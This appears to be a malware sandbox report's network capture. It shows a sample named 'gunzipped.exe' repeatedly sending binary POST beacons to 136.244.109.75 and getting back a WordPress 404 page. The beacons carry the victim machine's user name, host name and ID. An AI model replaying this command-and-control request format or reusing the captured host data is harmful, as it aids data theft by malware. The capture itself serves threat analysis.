Apr 17, 2024 03:18:49.029417038 CEST	49790	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:49.029450893 CEST	80	49790	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:49.029460907 CEST	49790	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:49.029489040 CEST	80	49790	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:49.029493093 CEST	49790	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:49.029526949 CEST	80	49790	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:49.029541016 CEST	49790	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:49.029567957 CEST	80	49790	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:49.029577971 CEST	49790	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:49.029613018 CEST	49790	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:49.170109987 CEST	49791	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:49.237473965 CEST	80	49790	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:49.237545013 CEST	80	49790	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:49.237569094 CEST	49790	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:49.237602949 CEST	49790	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:49.378196001 CEST	80	49791	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:49.378537893 CEST	49791	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:49.380265951 CEST	49791	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:49.588006020 CEST	80	49791	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:49.588119030 CEST	49791	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:49.796262980 CEST	80	49791	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:50.517529964 CEST	80	49791	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:50.517565012 CEST	80	49791	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:50.517585039 CEST	80	49791	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:50.517602921 CEST	80	49791	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:50.517623901 CEST	80	49791	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:50.517642021 CEST	80	49791	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:50.517651081 CEST	49791	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:50.517662048 CEST	80	49791	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:50.517651081 CEST	49791	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:50.517680883 CEST	80	49791	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:50.517699957 CEST	80	49791	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:50.517720938 CEST	80	49791	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:50.517731905 CEST	49791	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:50.517731905 CEST	49791	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:50.517760992 CEST	49791	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:50.517813921 CEST	49791	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:50.654544115 CEST	49792	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:50.725821018 CEST	80	49791	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:50.725852966 CEST	80	49791	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:50.725897074 CEST	49791	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:50.725897074 CEST	49791	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:50.866089106 CEST	80	49792	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:50.866219997 CEST	49792	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:50.868000984 CEST	49792	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:51.075726032 CEST	80	49792	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:51.075810909 CEST	49792	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:51.283601046 CEST	80	49792	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:52.030656099 CEST	80	49792	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:52.030715942 CEST	80	49792	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:52.030755043 CEST	80	49792	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:52.030769110 CEST	49792	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:52.030795097 CEST	80	49792	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:52.030812979 CEST	49792	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:52.030833960 CEST	80	49792	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:52.030846119 CEST	49792	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:52.030872107 CEST	49792	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:52.030874014 CEST	80	49792	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:52.030910015 CEST	49792	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:52.030915976 CEST	80	49792	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:52.030955076 CEST	80	49792	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:52.030960083 CEST	49792	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:52.030992985 CEST	80	49792	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:52.030994892 CEST	49792	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:52.031030893 CEST	49792	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:52.031032085 CEST	80	49792	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:52.031075001 CEST	49792	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:52.170833111 CEST	49793	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:52.238970041 CEST	80	49792	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:52.239033937 CEST	80	49792	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:52.239072084 CEST	49792	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:52.239088058 CEST	49792	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:52.379143000 CEST	80	49793	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:52.379365921 CEST	49793	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:52.381113052 CEST	49793	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:52.589055061 CEST	80	49793	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:52.589148998 CEST	49793	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:52.798549891 CEST	80	49793	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:53.502126932 CEST	80	49793	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:53.502182961 CEST	80	49793	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:53.502221107 CEST	80	49793	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:53.502259970 CEST	49793	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:53.502300024 CEST	80	49793	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:53.502338886 CEST	80	49793	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:53.502376080 CEST	80	49793	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:53.502412081 CEST	80	49793	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:53.502420902 CEST	49793	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:53.502420902 CEST	49793	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:53.502420902 CEST	49793	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:53.502420902 CEST	49793	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:53.502450943 CEST	80	49793	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:53.502458096 CEST	49793	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:53.502489090 CEST	80	49793	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:53.502501011 CEST	49793	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:53.502527952 CEST	80	49793	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:53.502538919 CEST	49793	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:53.502573967 CEST	49793	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:53.710587025 CEST	80	49793	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:53.710627079 CEST	80	49793	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:53.710645914 CEST	49793	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:53.710702896 CEST	49793	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:53.715018034 CEST	49794	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:53.923048019 CEST	80	49794	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:53.923162937 CEST	49794	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:53.924912930 CEST	49794	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:54.133012056 CEST	80	49794	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:54.136291027 CEST	49794	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:54.344399929 CEST	80	49794	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:55.068927050 CEST	80	49794	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:55.068984985 CEST	80	49794	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:55.069022894 CEST	80	49794	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:55.069061041 CEST	80	49794	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:55.069101095 CEST	80	49794	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:55.069133043 CEST	49794	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:55.069133043 CEST	49794	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:55.069139004 CEST	80	49794	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:55.069179058 CEST	80	49794	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:55.069189072 CEST	49794	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:55.069219112 CEST	80	49794	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:55.069256067 CEST	80	49794	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:55.069295883 CEST	80	49794	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:55.069312096 CEST	49794	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:55.069340944 CEST	49794	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:55.277491093 CEST	80	49794	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:55.277523994 CEST	80	49794	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:55.277571917 CEST	49794	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:55.284897089 CEST	80	49794	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:55.284951925 CEST	80	49794	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:55.285053968 CEST	49794	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:55.299712896 CEST	80	49794	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:55.299777031 CEST	80	49794	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:55.299827099 CEST	49794	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:55.314048052 CEST	80	49794	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:55.314090014 CEST	80	49794	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:55.314147949 CEST	49794	80	192.168.2.5	136.244.109.75

HTTP Request Dependency Graph

136.244.109.75

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49705	136.244.109.75	80	4080	C:\Users\user\Desktop\gunzipped.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 03:16:50.877994061 CEST	244	OUT	POST /index.php/1748937 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 136.244.109.75 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 412D3974 Content-Length: 180 Connection: close
Apr 17, 2024 03:16:51.081429005 CEST	180	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: 'ckav.rualfons936905ALFONS-PCk0FDD42EE188E931437F4FBE2CiK1ov
Apr 17, 2024 03:16:52.016489029 CEST	1289	IN	HTTP/1.0 404 Not Found Date: Wed, 17 Apr 2024 01:16:50 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found – Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world » Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world » Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/! This file is auto-generated /!function(i,n
Apr 17, 2024 03:16:52.016509056 CEST	1289	IN	Data Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
Apr 17, 2024 03:16:52.016521931 CEST	1289	IN	Data Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
Apr 17, 2024 03:16:52.016536951 CEST	1289	IN	Data Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
Apr 17, 2024 03:16:52.016551971 CEST	1289	IN	Data Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
Apr 17, 2024 03:16:52.016565084 CEST	1289	IN	Data Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
Apr 17, 2024 03:16:52.016578913 CEST	1289	IN	Data Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
Apr 17, 2024 03:16:52.016592979 CEST	1289	IN	Data Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
Apr 17, 2024 03:16:52.016608000 CEST	1289	IN	Data Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
Apr 17, 2024 03:16:52.016623020 CEST	1289	IN	Data Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49706	136.244.109.75	80	4080	C:\Users\user\Desktop\gunzipped.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 03:16:52.374211073 CEST	244	OUT	POST /index.php/1748937 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 136.244.109.75 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 412D3974 Content-Length: 180 Connection: close
Apr 17, 2024 03:16:52.578356028 CEST	180	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: 'ckav.rualfons936905ALFONS-PC+0FDD42EE188E931437F4FBE2CT2tU2
Apr 17, 2024 03:16:53.501743078 CEST	1289	IN	HTTP/1.0 404 Not Found Date: Wed, 17 Apr 2024 01:16:52 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 